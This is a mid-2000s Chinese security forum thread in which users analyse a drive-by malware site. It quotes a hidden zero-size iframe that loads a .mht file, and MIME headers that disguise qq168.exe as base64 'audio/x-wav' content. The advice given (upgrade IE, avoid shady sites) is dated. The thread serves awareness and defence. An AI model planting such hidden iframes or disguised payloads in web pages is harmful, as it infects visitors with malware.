|
 | 作者: TomyChen [quest]
 版主 |
登录 |
| 做的一个分析是从另外一个类似于这种恶意网站上的代码分析而来的 <iframe src=http://www.fucking.com/fuckguy/fucking.mht width=0 height=0></iframe> 问题就出在这个fucking.mht下。(IE可以将HTML页面,包括内链的图片,保存为单个的mht文件。mht文件遵循MIME标准,包括IE,Outlook在内的许多软件可以直接打开。)由于用了iframe可能是做为隐藏标记(事实上,我没登陆该网站。公司不让上,我只能搞个小软件把代码给down下来的)。这样登陆的时候就会神不知鬼不觉的下载了fucking.mht文件。我把这个mht文件下载后以editplues(或者你可以用notepad打开)。你会发现系统要你下载一个软件。(也许存在IE版本的问题,可能老版本会不提示,或者是下载到本地后才会提示,具体原因这里不做深研了。有兴趣的可以自行研究,到时别忘了把你的成果post一份给我:D)而正是这个.exe程序在你的系统里做乱。至今为止还没有一家防病毒公司给可以清除这一病毒。(估计快了)给大家的建议是将IE升级到6.0。有事没事别到一些乱七八糟的网上跑。再给大家提个醒。类似于什么qq啊什么sex18/16有这类关键字的域名,还是少上为妙。该干嘛的干嘛去,少去一些无聊的网站省点心。好了,我也不知道还有什么要分析的啦。大家将就着防着点吧。公司做了一些限制,分析也不便。 鄙视这种卖弄技术的电脑败类!一切的! 由于本人实在看不习惯该网站的作风故把该站域名丑化。而且我也不想大家不小心跑到那个该死的站去... |
| 地主 发表时间: 05/07 11:09 |
 | 回复: CyberSpy [cyberspy]  论坛用户 |
登录 |
|
iframe 的确是个老问题了~ 大家一定记得把ie升级或者装上杀毒软件,打开其网页实时监控功能,还有就是不要去那些垃圾网站! TomyChen ^_^ |
| B1层 发表时间: 05/07 21:30 |
| 回复: TomyChen [quest] 版主 |
登录 |
|
修正一下 上面并不是用editplues打开时要求下载的。而是鼠标经过。(其实也不是,真正的原因是windows的web打开文件夹方式。他会把这类文件来个预览,其实就相当于你把他打开了...BT的M$) |
| B2层 发表时间: 05/08 08:39 |
 | 回复: NetDemon [netdemon]  ADMIN |
登录 |
|
没找到含有mht的东西,不知道fucking哪里,把fucking的对象留言给我 |
| B3层 发表时间: 05/08 15:27 |
| 回复: CyberSpy [cyberspy] 论坛用户 |
登录 |
|
这个家伙http://www.qq168.net, 的确是如Tomychen所说,是利用iframe编码漏洞 ,我由于是xp系统,所以没有中招,但是在ie临时文件夹中已经下载了这个文件 qq168.mht ,用notepad打开后, …… Content-Type: audio/x-wav; name="qq168.exe" Content-Transfer-Encoding: base64 Content-ID: <Mud> …… 由于是base64编码,不知道如何查看源代码。正在找转换工具…… |
| B4层 发表时间: 05/09 12:42 |
| 回复: ydrr [ydrr]  论坛用户 |
登录 |
|
请问正常的msconfig启动里 一般是启动那几个windows程序 我的感觉有些不正常的 |
| B5层 发表时间: 05/10 09:31 |
 | 回复: z7 [skyzz]  论坛用户 |
登录 |
|
邮件的功能可以转换base64编码,可不可以转回来 |
| B6层 发表时间: 05/29 21:04 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 接QQ168的帖。置顶后不能回复,netdemon这功能有非常大的必要改进